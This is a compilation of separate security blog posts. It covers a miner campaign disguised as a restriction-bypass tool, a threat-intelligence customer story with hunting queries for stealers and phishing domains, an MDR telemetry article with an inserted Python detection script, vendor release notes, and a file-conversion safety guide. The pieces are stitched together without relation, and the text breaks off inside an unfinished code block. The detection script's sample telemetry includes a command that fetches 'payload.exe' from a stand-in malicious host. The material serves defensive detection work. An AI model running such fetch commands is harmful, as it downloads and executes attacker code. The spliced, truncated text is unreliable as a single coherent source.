Cybercriminals are distributing a miner disguised as a restriction-bypassing tool | Kaspersky official blog

Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.

This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.

How cybercriminals exploit unsuspected users — and where bloggers fit into the picture — is what we’ll explore in this article.

Hackers disguised as honest developers

There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.

There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.

Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.

Where do bloggers fit in?

We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.

Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.

In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.

What about the miner?

The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.

For more about the malicious archive and how it persists in the system, check our post on Securelist.

How to protect yourself from miners

  • Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
  • Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
  • Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.

Here are some relevant articles you can read to learn more about miners and their dangers:

Mario Forever, malware too: a free game with a miner and Trojans inside

XMRig Miner as a New Year’s gift

Prices down, miners up


How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks 

How can security teams effectively monitor evolving attacks and stay ahead of constantly shifting attacker infrastructure? We spoke with a chief information security officer at a transport company about how they use subscriptions to Search Updates in Threat Intelligence Lookup to tackle this challenge. 

Here’s what we learned. 

Company Info 

Without getting into any specifics, our company operates in the transportation sector, managing logistics across North America, Latin America, and Europe. Right now, the IT security team is at 30 professionals, and as the CISO I’m responsible for overseeing strategic planning, risk management, and operations. Speaking of our use of ANY.RUN’s products, currently we have licenses for both the Interactive Sandbox and TI Lookup.

What is Threat Intelligence Lookup

TI Lookup from ANY.RUN provides a searchable database of over 40 types of indicators of compromise, attack, and behavior. The new data is extracted from thousands of public malware and phishing samples analyzed in ANY.RUN’s Interactive Sandbox every day.

Since all threats are executed in virtual machines, ANY.RUN takes a comprehensive snapshot of the activity recorded during analysis, from network traffic and file paths to registry modifications and mutexes.


Key Security Challenges Faced 

I’d say the entire transportation industry rests on email correspondence. Our company, despite being no match to giants like DHL, still has thousands of clients, contractors, and suppliers that we need to communicate with daily. Naturally, even a small email security slip-up, like exposing a few messages, could create major problems across the board. And attackers know this, too. 

That’s why we pour a good chunk of the team’s resources into threat hunting and ensuring we have a grasp of the current threat landscape. We’re constantly monitoring for the recent attacks, phishing scams, malware campaigns, new CVEs, anything that may somehow be of concern to us. Of course, we can’t gobble up intel on every single threat out there, so we narrow it down to what’s relevant for our industry, and some of the core clients’ industries. 

Where TI Lookup Fits in the Threat Hunting Strategy 

Like any good security setup, we break ours down into areas. TI Lookup adds value pretty much evenly across all of them, from checking indicators as part of triage to discovering threat context in incident response.  

Yet, if we’re talking about threat hunting, we subscribe to Search Updates in TI Lookup to keep up with the changes in ongoing cyber attacks and automate the collection of new indicators of compromise (IOCs) and threat samples. Let me explain how it works. 

Search Updates in TI Lookup 

TI Lookup users can subscribe to custom search queries to receive timely updates on relevant Indicators of Compromise (IOCs), Indicators of Attack (IOAs), and Indicators of Behavior (IOBs) belonging to the threats of their interest. 


Our threat hunting team is tasked with:  

  • Monitoring the current threat landscape 
  • Gathering data on the threats that are relevant to us 
  • Converting the data into actionable signatures and detection rules 

There are several sources for such data, with publicly available research and reports published by other companies being the most common one. The problem here is that attackers constantly shift infrastructure – C2 servers might cycle IPs every 48 hours. So, relying on the indicators we find in public reports can do only so much. And that is precisely the detection gap that Search Updates in TI Lookup help to bridge. 

TI Lookup lets users receive result updates on queries of their interest 

Subscribing to Search Updates in TI Lookup allows us to use more stable indicators of behavior (IOBs) to track all the latest changes in specific attacks and see if they are still ongoing. IOBs are things like the tools used by attackers, the kill chain techniques, and infection traces on the system such as created directories, file names and types, etc. The things that do not tend to expire as fast as short-lived network infrastructure of attackers or hashes. 

Query subscriptions are displayed in the left-side menu with the number of new results next to them 

Essentially, with TI Lookup, we can put several IOBs related to a single attack together and use them in a search query to get notified about the latest samples and IOCs, which the threat hunting team can process and turn into detection rules. 

The result is that we can follow active threats that may potentially target our company almost in real time because TI Lookup is updated every few hours with fresh data. 



Some of the Use Cases for Search Updates 

Our current collection of query subscriptions is well beyond a hundred entries. I will try to give you a few general types of threats that we tend to add to it and some of the examples.  

At the moment we subscribe to well over a hundred search queries. To give you an idea of what we monitor, I’ll give you a couple of common threats we tend to follow. 

Geo-Targeted Threats  

While our HQ is in the United States, we have several local offices, which also become extensively targeted with cyber attacks. Search Updates make it easier for us to track several types of threats occurring in a specific country. 

For example, we make sure to check for new samples of email-distributed infostealers in Colombia: 

submissionCountry:"co" AND threatName:"stealer" AND filePath:".eml" OR filePath:".msg"

TI Lookup displays the latest public sandbox analyses featuring infostealers together with .msg and .eml files 

For this query, we get several updates almost every week. 

One of the samples returned by TI Lookup involved AsyncRAT

We check the new samples and see if they have anything of value and if so, use the indicators extracted by the sandbox to make signatures to scan the company’s infrastructure for any matching threats. 

Common Vulnerabilities and Exposures (CVEs) 

Another top concern on any threat hunters’ list is CVEs, both old and new. One of the recent examples is CVE-2025-21298, the vulnerability where simply previewing a malicious .rtf document in Outlook leads to remote code execution and system compromise. 

As soon as we learned about it, we made sure to go to TI Lookup and sign up for a query that would provide us with relevant samples in case any attackers decided to abuse this vulnerability. 

In the query, we combined the file type (rtf) with Outlook, used the attc-doc (document attachment) tag, and excluded pdfs:  

fileEventPath:"rtf$" AND commandLine:"outlook.exe" AND threatName:"attc-doc" AND NOT threatName:"attc-pdf"

The Events tab in TI Lookup provides a list of command line logs recorded across relevant sandbox sessions 

As a result, we now can minimize the manual research on this threat and in case an actual attack with this CVE is uploaded to TI Lookup, we’ll be notified about it. 

Another thing that I think is worth mentioning here is that this CVE is a great example of how flexible TI Lookup can be. Despite not having a specific tag for this threat, we were able to make up for that by using the big selection of search parameters. 

Credential-Theft Attacks  

Given phishing is by far the top threat our company faces, one of the most common types of it is fake credential-stealing forms. 

There is a campaign that has been going for a while, where attackers send emails that contain links to fake Microsoft 365 pages. The catch is that the malicious domain names are designed to masquerade as legit Microsoft ones. One of the standout things here is the use of “0” and “o” before “365”. Needless to say, the Search Updates feature does a great job letting us know about the new domains and actual examples of these attacks. 

domainName:"o365." OR domainName:".o365" OR domainName:"0365." OR domainName:".0365"

TI Lookup lists all the matching domains found across relevant sandbox sessions

The team collects new domains and email samples and improves detection of any possible phishing attempts against our own infrastructure. 





Search Updates Hacks 

The thing that’s not related to Query Subscriptions per se but is still of huge help is the wildcards. It really adds flexibility to the searches, so we potentially set up queries to be more specific and general, depending on the indicators we use for a threat. 

Just last week, we subscribed to a query for a new campaign where attackers use website addresses that start with “google.com” but then have random strings of characters afterwards. 

To get the newest variants of these domains, we added the “?” wildcard to the query – which stands for any single character. We used four question marks to account for the random part of the domain. 

domainName:"google.com.????"

Each of the domains can be explored further in the sandbox sessions where they were logged 

Search Updates let us know every time a matching fake domain is added to TI Lookup’s database. 

Impact on Security 

In terms of the company’s security, TI Lookup provides us with some of the latest threat intelligence we can get. We can apply it immediately while indicators are still active to identify threats and protect the organization’s infrastructure in advance.

It also improves our awareness of the threat landscape, letting us track a wider array of attacks. We now have more data on a broader pool of threats than ever before and can identify the ones that are still ongoing and those that are no longer active. 

Impact on Operations 

If we’re talking about the team’s performance, the productivity definitely went up after we began using Query Subscriptions. Back in the day, we had to allocate a lot of time and staff to follow up on attacks that were relevant to us. This was a lot of manual work. I’m not saying that we no longer do it, but receiving Search Updates definitely made the process much easier.  

We now get automated updates and can actually focus on more threats than before, because we no longer need to rely on guesswork in deciding which attacks will be more likely to affect us. 

Now we simply create a query and hit subscribe. The more new results we see arriving for a particular threat in TI Lookup the higher priority it gets. 

Team Feedback 

Most of the team is well familiar with the ANY.RUN sandbox, so adopting TI Lookup felt natural for them. It was with some of the new folks on the team that we had to work a little harder to get them to a place where they could comfortably use the service. They mostly struggled with the query parameters and their meanings, as well as tags in the sandbox, which are the same in TI Lookup. But most of them managed to become fairly proficient in a week or two.

Conclusion 

We want to thank the guest for taking the time to share their story and real-world examples of using TI Lookup. The behind-the-scenes view of a threat hunting team’s work is always a rare privilege and we really appreciate it. Our hope is that this article will help other users considering integrating the service in their organization with laying the groundwork for successful implementation.  

As always, if you are open to letting others know how your team uses ANY.RUN’s products, we’ll be happy to hear from you at support@any.run

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.




What to collect on computers for monitoring complex threats

To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.

Dumping registry hives

Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.

To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.

Malicious code in memory

Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.

Suspicious services

The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.

Access to a malicious host

Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.

Memory fragment dumps

To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.

Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.

Executing a low-reputation object

Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.

Adding privileged users

Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.

Remote process execution

In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.

Malicious address in event parameters

In any event parameters — but most commonly in the command line of the running process — a known malicious URL may appear. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).

Telemetry sources

Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:

  • Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
  • OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by Audit Daemon (aka auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for settings for Windows can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
  • Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
  • Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.
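As an added example (not code from the report or from Kaspersky’s MDR service), the Python pass below applies several of the detection categories listed above (LSASS access, privileged group changes, malicious URLs in command lines, low-reputation executables, remote process launches, sensitive registry hive access) to a handful of constructed telemetry events. The JSON field names are an assumed, simplified EDR/OS-event schema, and the reputation sets, hashes and hostnames are constructed placeholders, not real indicators.

```python
"""Minimal detection pass over constructed endpoint telemetry (JSON lines).

The field names below are an assumed, vendor-neutral schema chosen for this
example; map them onto whatever your EPP/EDR or Sysmon/auditd pipeline emits.
"""
import json
import re
from typing import Callable, Dict, List, Optional

# Constructed sample telemetry, not real logs. One JSON object per line.
SAMPLE_TELEMETRY = r'''
{"type":"process_access","source_image":"C:\\Windows\\System32\\svchost.exe","target_image":"C:\\Windows\\System32\\lsass.exe","user":"NT AUTHORITY\\SYSTEM"}
{"type":"process_access","source_image":"C:\\Users\\jdoe\\tool.exe","target_image":"C:\\Windows\\System32\\lsass.exe","user":"CORP\\jdoe"}
{"type":"account_change","action":"member_added","group":"Domain Admins","member":"CORP\\svc-backup","actor":"CORP\\jdoe"}
{"type":"account_change","action":"member_added","group":"Remote Desktop Users","member":"CORP\\asmith","actor":"CORP\\helpdesk"}
{"type":"process_create","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c ping 8.8.8.8","sha256":"PLACEHOLDER_HASH_A","user":"CORP\\jdoe","remote_logon":false}
{"type":"process_create","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c start http://malicious.example/payload.exe","sha256":"PLACEHOLDER_HASH_A","user":"CORP\\jdoe","remote_logon":false}
{"type":"process_create","image":"C:\\Users\\Public\\update.exe","command_line":"update.exe -q","sha256":"PLACEHOLDER_HASH_B","user":"CORP\\jdoe","remote_logon":true}
{"type":"registry_access","image":"C:\\Users\\jdoe\\tool.exe","key":"HKLM\\SAM","user":"CORP\\jdoe"}
{"type":"registry_access","image":"C:\\Windows\\System32\\lsass.exe","key":"HKLM\\SAM","user":"NT AUTHORITY\\SYSTEM"}
'''

# Constructed reputation data standing in for the MDR provider's TI databases.
MALICIOUS_HOSTS = {"malicious.example"}              # URL-reputation database
LOW_REPUTATION_HASHES = {"PLACEHOLDER_HASH_B"}        # file-reputation database
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
SENSITIVE_HIVES = {"HKLM\\SAM", "HKLM\\SECURITY"}     # hives holding credential material
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
URL_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)

Event = Dict[str, object]
Rule = Callable[[Event], Optional[str]]


def parse_telemetry(text: str) -> List[Event]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def rule_lsass_access(ev: Event) -> Optional[str]:
    """Non-SYSTEM process opening LSASS: possible credential memory dump."""
    if ev.get("type") != "process_access":
        return None
    if not str(ev["target_image"]).lower().endswith("\\lsass.exe"):
        return None
    if ev["user"] == SYSTEM_USER:      # OS components routinely touch LSASS
        return None
    return "lsass_memory_access"


def rule_privileged_group_change(ev: Event) -> Optional[str]:
    """Account added to a privileged domain or local group."""
    if ev.get("type") == "account_change" and ev.get("action") == "member_added" \
            and ev.get("group") in PRIVILEGED_GROUPS:
        return "privileged_group_member_added"
    return None


def rule_malicious_url_in_cmdline(ev: Event) -> Optional[str]:
    """Known-bad host appearing in the full command line of a new process."""
    if ev.get("type") != "process_create":
        return None
    for host in URL_RE.findall(str(ev.get("command_line", ""))):
        if host.lower() in MALICIOUS_HOSTS:
            return "malicious_url_in_command_line"
    return None


def rule_low_reputation_object(ev: Event) -> Optional[str]:
    """Executable whose hash is flagged by the file-reputation feed."""
    if ev.get("type") == "process_create" and ev.get("sha256") in LOW_REPUTATION_HASHES:
        return "low_reputation_executable"
    return None


def rule_remote_process_execution(ev: Event) -> Optional[str]:
    """Process launched under a remote (network/RDP) logon session."""
    if ev.get("type") == "process_create" and ev.get("remote_logon"):
        return "remote_process_execution"
    return None


def rule_sensitive_hive_access(ev: Event) -> Optional[str]:
    """Non-SYSTEM process reading a credential-bearing registry hive."""
    if ev.get("type") != "registry_access":
        return None
    if str(ev["key"]).upper() in SENSITIVE_HIVES and ev["user"] != SYSTEM_USER:
        return "sensitive_registry_hive_access"
    return None


RULES: List[Rule] = [
    rule_lsass_access, rule_privileged_group_change, rule_malicious_url_in_cmdline,
    rule_low_reputation_object, rule_remote_process_execution, rule_sensitive_hive_access,
]


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Run every rule over every event; one event may raise several alerts."""
    alerts = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                alerts.append({"rule": name, "event": ev})
    return alerts


def run_sample() -> List[str]:
    """Rule names fired by the constructed telemetry, in event order."""
    return [a["rule"] for a in detect(parse_telemetry(SAMPLE_TELEMETRY))]


if __name__ == "__main__":
    for alert in detect(parse_telemetry(SAMPLE_TELEMETRY)):
        print(alert["rule"], json.dumps(alert["event"]))
```

The point of the SYSTEM-user exclusions is the caveat from the report: the same telemetry that exposes an attack is also generated by legitimate OS components, so each rule needs a baseline of expected actors before it is useful in production.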


Release Notes: Threat Intelligence Reports, New Website Design, & Enhanced Detection

Hey, cybersecurity enthusiasts! 

February brought major enhancements to ANY.RUN, improving threat intelligence, detection capabilities, and overall user experience. 

With the launch of Threat Intelligence Reports, security professionals now have access to detailed, expert-driven analyses of cyber threats, malware, and APT activities.

We also introduced a redesigned website, making navigation more intuitive and structured. 

On the detection side, we significantly improved our threat-hunting capabilities, adding 314 new Suricata rules, refining behavior signatures, and expanding our YARA rule database. These updates strengthen real-time threat visibility and detection accuracy, helping analysts respond faster to emerging cyber threats. 

Let’s take a closer look at February’s updates and how they enhance your malware-hunting workflow. 

Product Updates 

Threat Intelligence Reports

In February, ANY.RUN introduced Threat Intelligence Reports in TI Lookup: detailed research on cyber threats, providing security professionals and decision-makers with actionable insights. 

Curated by our experts, these reports support threat monitoring, incident response, R&D, and strategic planning, covering malware, ransomware, phishing campaigns, and APTs.  

Built on real-world threat data, sources include our Interactive Sandbox, TI Lookup, and community-driven malware analyses. 

View sample report on APT41 Attacks    

An example of a recent TI report

How to access TI Reports 

Paid TI Lookup users get full reports, while summaries and select reports are available for free. 

  1. Go to intelligence.any.run
  2. Click the TI Reports icon on the left. 
  3. Select a report from the feed. 

New reports are marked with a “New” badge for quick access. 



What’s inside TI Reports? 

Each report provides a detailed threat overview, covering key aspects such as: 

  • Threat actor or malware profile: Origins, objectives, targeted industries, and regions. 
  • TTPs: Methods used by attackers, helping in detection and mitigation. 
  • IOCs, IOBs, IOAs: Critical data for identifying threats in your environment. 
  • YARA and SIGMA rules: Ready-to-use detection rules for security systems. 
  • Sandbox analysis links: Direct access to real-world threat samples in action. 
  • Additional references: Supporting research and external resources for deeper insights. 

New Website Design: A More User-Friendly Experience 

In February, we introduced a redesigned ANY.RUN website, making it more intuitive, structured, and easier to navigate. The new design makes sure that all essential cybersecurity resources and solutions are now better organized and easily accessible. 

The new redesigned webpage of ANY.RUN

Whether you’re exploring threat intelligence, running sandbox analyses, or researching cybersecurity insights, the updated layout enhances usability for both security experts and new users. 

Threat Coverage Updates 

Suricata Rules 

In February, we added 314 new Suricata rules, strengthening our network-based threat detection. Notable updates include: 

  • A Booking.com phishing rule, designed to detect fraudulent activity targeting users. 
  • A rule for Australia Gov phishing attempts, though it covers only partial cases due to dynamic URL changes and regional access restrictions. 

New Behavior Signatures 

This month, we expanded behavior-based detection, adding new mutex findings, threat detections, and suspicious activity signatures. These updates improve the ability to track malware persistence mechanisms and evasive techniques in real time. 

New Malware & Threat Detections 

Suspicious Activities & Evasion Techniques 

  • Disabling Windows security features: 
      • Firewall 
      • SmartScreen 
      • Task Manager 
      • Command Prompt 
      • Remote Desktop Access 

Additional Mutex Detections 

  • Darkside, Crytox, Xtreme, Funlocker, Redlocker, Roblox, Aida64, Smartsteamemu, Processlasso, Cactus, Phobos 
  • Nitrogen (mutex & detection) 
  • Various software-related mutex detections, including COYOTE mutex, Proxifier, Wireshark, Java, Adguardvpn, Cheatengine, Opera, Electron Js, Adobeinstaller, Hotbar, Quickdriverupdater, and Pcappstore 

New YARA Rule Updates 

In February, we expanded our YARA rule database, enhancing malware detection and classification. The latest rules target a variety of stealers, RATs, ransomware, and loaders, improving detection accuracy for emerging threats. 

  • Spearal 
  • Veaty 
  • Clipog 
  • Cerbfyne 
  • Funklocker 
  • Redlocker 
  • Cloudscout 
  • MillenniumRAT 
  • JasonRAT 
  • Meduza 
  • CelestialRAT 
  • RansomHub 
  • Xorist 
  • Hellcat 
  • HKBot 
  • MiyaRAT 
  • Zhong 
  • DarkTrack 






How to safely convert files | Kaspersky official blog

You almost certainly know the situation when a friend or colleague sends you files in a format you can’t open. For example, you asked for photos, expecting JPEGs or PNGs, but instead they arrive in HEIC format. What do most people do in this case? That’s right, they look for a free online file-converter.

If you’re a long-time reader of our Kaspersky Daily blog, you probably already know that the most popular method of doing most anything is hardly ever the safest. File conversion is no different. Let’s figure out together what threats are lurking inside free online-converters, and find out how to change file format safely.

Why is this important? Because converting a file is not simply a matter of changing its extension — otherwise you could just rename the file from, say, EPUB to MP3. Instead, the converter program must read the file, understand what it contains, convert the data and re-save it in a different format — and each of these stages poses its own threats.

Personal data leakage, malware, and other threats

The first risk that springs to mind is personal data leakage. Even if you’re a “who on earth needs my data?” kind of person, you should still take care: your vacation snaps may be of no use to anyone, but confidential work documents are a different kettle of fish. When you upload a file to an online converter, you can never be sure that the site won’t save a copy of your file for its own purposes. Uploaded data can easily end up in the hands of scammers, and even be used to launch an attack on your company. And if you get fingered as the intruders’ entry point into the corporate network, your infosec team will hardly be thanking you.

If you think this threat applies solely to text or spreadsheet documents, and that a photo of some accounting statement can be safely uploaded and converted to PDF, think again. Optical character recognition (OCR) was invented last century, and now, with AI, even mobile Trojans have learned to extract data of interest to attackers from photos in your smartphone gallery.

Another common risk is malware infection. Some dubious converter sites may modify your files or add malicious code to the converted file — and without reliable protection you won’t know about it until it’s too late. The converted files may contain scripts, Trojans, macros, and other nasty stuff we’ve covered in detail many times.

Converter sites may also be phishing, so services asking you to register, enter a load of personal data, and buy a subscription just to convert a file from, say, PDF to DOC, should be eyed with suspicion. If you still plan to use an online converter, look for one that doesn’t require registration, and never give it your payment details.

How to convert files locally

The safest way is to convert files locally; that is, on your own device without using third-party sites. This way, the data is guaranteed to remain confidential — at least until you connect to the internet. You can change a file’s format using either system tools or popular programs.

For text and spreadsheet files, as well as presentations, Microsoft Office can help. It can read many file formats using the File → Open or File → Import commands (depending on the version of Office and the operating system), and save them in different formats using the File → Save as → Save as type (or File format) or File → Export commands. The list of available formats is long: from PDF and HTML to the OpenDocument standard.

If you don’t have access to Microsoft products, you can use the free alternatives LibreOffice and OpenOffice, which also support various text and table file formats. On Windows, text documents can also be converted in a built-in WordPad editor, although it reads far fewer file types.

For macOS users, Apple’s office applications (Pages, Numbers, Keynote) recognize and save documents in many different formats.

As for graphics files, things are even simpler. Built-in operating-system tools can help convert images from PNG to JPEG. On Windows, just use this command in Paint: File → Save as. macOS users don’t even need to open any programs — just right-click the image in Finder and select Quick Actions → Convert Image. The window that opens gives you a choice of format (PNG, JPEG, HEIF) and converted image size.

If the above conversion options aren’t enough — for example, you’re handling audio/video files or specific file formats — look for offline tools with a solid reputation as free and open-source software (FOSS).

For video (and many audio) formats, check out Handbrake (Windows, macOS, Linux) and Shutter Encoder (Windows, macOS, Linux); for audio, try Audacity, and for images, ImageMagick (Windows, macOS, Linux).

Most multimedia converters simply add a graphical interface to FFmpeg, perhaps the top tool for converting multimedia formats. Its only drawback (which for some is a plus) is that it only works from the command line.

If you’re fine with the command line, FFmpeg is the obvious choice (but, being fine, you’ve probably got it installed already). Another great choice for command line fans is Pandoc — a versatile converter of text and markup formats. Incidentally, under Extras on the Pandoc website, you can find many third-party utilities for adding a graphical interface to this converter, or embedding it in other editors, services, or even operating systems.

All of the above converters are FOSS (free and open-source software), and support at least the most popular operating systems: Windows, macOS, Linux.

When choosing other offline converters, make sure that the conversion really does take place locally — many tools simply provide an interface to online converters and still send your source files to a server. This is very easy to check by disconnecting from the internet before converting. If the tool doesn’t work, it’s not an offline converter.

How to convert files online as safely as possible

Sometimes there’s no avoiding online converters — for example, you were sent a file in some highly exotic or outdated format. The next section looks at how to minimize threats when converting files online.

Alas, it’s impossible to guarantee confidentiality when using an online converter. Its creators can write whatever they want in the site’s policies, but you’ll never know what actually happens to your uploaded data. Therefore, the golden rule is: never convert sensitive information online.

If you have a Google account (and who doesn’t?), you can upload the file you want to convert to Google Drive (most office formats are accepted), right-click, and open it in Google Docs/Sheets/Slides, then download it in a different format. Among the pluses, this method also works on mobile devices — although in this case it’s more convenient to open the file in the relevant Google editing tool.

Another fairly safe way to convert either text or graphics files is Adobe’s online converter. You can even use it for free on a smartphone — but there’s a catch: all uploaded data gets stored on Adobe’s servers, making this method unsuitable for confidential files.

Follow these rules to ensure maximum safety when converting files online:

  • Use reputable online converters.
  • Open the converter site in a new browser window in Incognito mode; this will reduce the amount of information collected about you — but not down to zero.
  • Use a reliable VPN to hide your real IP address from the converter site.
  • Review the online converter’s privacy policy to understand how your data will be handled. Make sure the service does not collect, store, or transfer information without your consent — or at least claims not to.
  • Check that the files for conversion do not contain confidential information.
  • Scan the converted files with an antivirus. Be very wary if the converter site wants you to download the result in an archive — especially a password-protected one, since this is the most common way to conceal a virus from security software. If you don’t have any protection software on your device (heaven forbid), you can scan the downloaded file using our online file checker.
  • Avoid unverified sites that require registration and payment details.

Unzip this

Lastly, a small life-hack that few people know about. Sometimes you don’t need to convert a file to another format at all, but just extract information from it; for example — pull images out of a text document or presentation in their original format. Doing this even with native editors is usually time-consuming and inconvenient — you have to export the images one by one, and the editors might change their size or compress them, deteriorating the picture quality.

But there’s a way round this. The secret is that files of many formats are nothing more than a compressed folder with subfolders that store “pieces of the puzzle”: text, images, embedded videos, and the like. And it’s all zipped. That means that almost all office-suite files are ZIPs with the extension changed to DOCX, PPTX, PAGES, etc.

To extract all the contents from this “archive”, you simply need to rename the file, changing its extension to ZIP, and then unzip it. The result will be a folder with subfolders in which all the “ingredients” of the original document are neatly laid out.

So, if you come across an unknown file format, first of all scan it for viruses with a reliable security solution, then make a copy of it, change the extension to ZIP (in macOS, if the file extension is hidden, you may need to press ⌘+I to change it), and try to unzip the file — in many cases this will work. Next, have a rummage around in the resulting folder — you’ll find all sorts of goodies!
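Because the OOXML and Pages containers are ordinary ZIP files, the rename trick can be done without renaming at all: check the first four bytes for the ZIP signature and read the archive in place. The script below is added here as an example and is not code from the original post. It pulls embedded images out byte-for-byte (no re-encoding, so no quality loss) and also flags what the scanning advice above warns about: encrypted entries, which a scanner cannot look inside, and an embedded vbaProject.bin, which means the document carries macros. The sample document is constructed in memory with a minimal OOXML-like layout; it is not a real Word file.

```python
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"
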